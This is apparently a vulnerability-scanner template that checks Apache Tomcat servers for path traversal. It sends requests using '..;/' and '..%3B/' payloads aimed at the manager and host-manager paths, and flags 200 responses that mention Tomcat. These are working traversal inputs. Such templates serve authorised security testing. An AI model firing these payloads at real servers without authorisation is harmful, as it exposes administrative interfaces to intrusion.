id: tomcat-path-traversal
info:
  name: Tomcat Path Traversal
  risk: Medium

params:
  - root: '{{.BaseURL}}'

variables:
  - dir: |
      ..;/
      ..;/manager/
      ..;/host-manager/
      ..%3B/
      ..%3B/manager/
      ..%3B/host-manager/

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/{{.dir}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "Apache Tomcat")